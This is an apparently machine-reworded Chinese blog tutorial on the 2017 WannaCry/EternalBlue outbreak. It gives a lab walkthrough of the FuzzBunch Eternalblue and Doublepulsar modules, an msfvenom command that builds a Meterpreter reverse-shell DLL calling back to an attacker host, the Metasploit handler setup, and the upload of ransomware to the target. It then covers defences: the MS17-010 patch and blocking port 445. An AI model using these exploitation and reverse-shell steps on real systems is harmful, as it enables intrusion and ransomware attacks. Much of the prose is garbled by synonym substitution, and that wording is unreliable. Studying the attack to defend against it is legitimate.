比特币病毒让你WannaCry？其实防御很简单

17年5月13日，犯警分子操纵NSA黑客兵器库泄露的“永久之蓝”倡议比特币病毒攻击事务。“永久之蓝”会扫描开放445文件共享端口的Windows机器，植入讹诈软件。因为以前国内屡次发作操纵445端口传布的蠕虫，运营商已对小我用户封掉445端口，但教育网还没有此限造，所以教育网是受攻击的重灾区！我们针对此病毒，解密其造造过程。

注：此陈述仅为科学研究，乱造病毒可不是闹着玩。按照中华人民共和国刑法第二百八十六条 违背国度规定，对计算机信息系统功用停止删除、修改、增加、干扰，形成计算机信息系统不克不及一般运行，后果严峻的，处五年以下有期徒刑或者拘役；后果出格严峻的，处五年以上有期徒刑。

永久之蓝东西阐发陈述

情况

攻击机1Win7 32位 专业版SP1192.168.61.133

攻击机2 kali2192.168.61.128

靶机win7 64位 旗舰版SP1192.168.61.129

尝试筹办

攻击机1安拆

python-2.6.6.msi

https://www.python.org/download/releases/2.6.6/

pywin32-221.win32-py2.6.exe

https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

下载方程式东西包并解压

开启靶机，靶机能够不关防火墙，以至能够安拆杀毒软件，但不克不及打上对应补钉

尝试步调

攻击机1进入东西目次，运行fb.py

输入靶机IP 192.168.61.129

输入攻击者IP 192.168.61.133

No 不启动重定向

No 不需要开启日记

4 创建新工程

Uenit_test 输入工程名

Use Eternalblue

然后是一路回车，因为满是默认设置装备摆设

确认一下启动

因为启用了fuzzbunch扩展，失败了会主动屡次测验考试，有时候是一次就胜利。

然后是另一个攻击模块的共同利用Doublepulsar

同样的全回车

曲到选系统选择64位的

选择攻击体例选运行dll

接下去要选择dll途径，然而我们还没有，就先放一边

开启攻击机2 kali，用来生成dll

msfvenom -p

windows/x64/meterpreter/reverse_tcp LHOST=192.168.61.128 LPORT=9999 -f dll >

/root/桌面/uenit_attack.dll

桌面目次下多了一个uenit_attack.dll，将其拷贝到攻击机1目次下

然后开启监听

msfconsole

msf > use

exploit/multi/handler

msf > set

LHOST 192.168.61.128

msf > set

LPORT 9999

msf > set

PAYLOAD windows/x64/meterpreter/reverse_tcp

msf > exploit

再回到攻击机1，已经将之前kali上的uenit_attack.dll拷贝到c：根目次下

然后输入dllpayload地址为 C:\\uenit_attack.dll

再一路回车

确认后起头

胜利以后返回kali查看，已近反弹回shell了。

Ipconfig

Dir

能够看到当前目次在c:\windows\system32

我们在当前创建一个目次并进入

然后上传我们的exe，好比讹诈软件

在靶机上的关于目次里，我们发现了上传上去的可施行法式

如下是当前靶机的界面

在攻击机中运行适才上传的讹诈软件

跳出了讹诈软件界面

而且发现讹诈软件加密了所有文档和图片，以及修改了壁纸。

防御办法

360nsa东西防御

然后就被要求安拆360平安卫士，接着就是打补钉，打上补钉一切就平安了

也能够自行打上微软补钉

https://technet.microsoft.com/zh-cn/library/security/MS17-010下载本身对应版本的补钉即可，查看本身系统版本，可在“我的电脑”或“计算机”上右键—属性即可

也有小伙伴希望白手起家，本身封闭端口

在起头菜单中选择“运行”或者win+r同时按呼出“运行”

输入gpedit.Msc呼出当地战略组编纂器

双击计算机设置装备摆设

Windows设置

平安设置

IP平安战略

右键空白处，选择创建IP战略

按照指示点击下一步

为战略定名后点击下一步

点击添加规则

为规则定名后点击添加

目的地址下拉选择“我的IP地址”，点击协议

协议下拉选择TCP，选择到此端口选择，填写445。

点击确定返回IP挑选器列表

点击确定返回新规则属性，点选封闭445那一规则

切换到挑选器操做栏目

点击添加操做

点选阻遏

在常规选项卡能够给那一操做定名，然后点确定

在那一战略上右键点击选择“分配”

我们验证下那一办法能否可行，再次用Eterblue东西攻击，得到

证明封闭445端口起感化了，一条封闭从外界到445端口数据的链路就被完全阻断了，为了避免nsa更多东西的攻击，需要封闭的端口还有135、137、138、139。

结语

目前，收集平安问题日益凸起，讹诈病毒也并非初次呈现，但是只要我们进步收集平安意识，及时打上系统补钉，留意杀毒软件的推送补钉，就能防备于未然。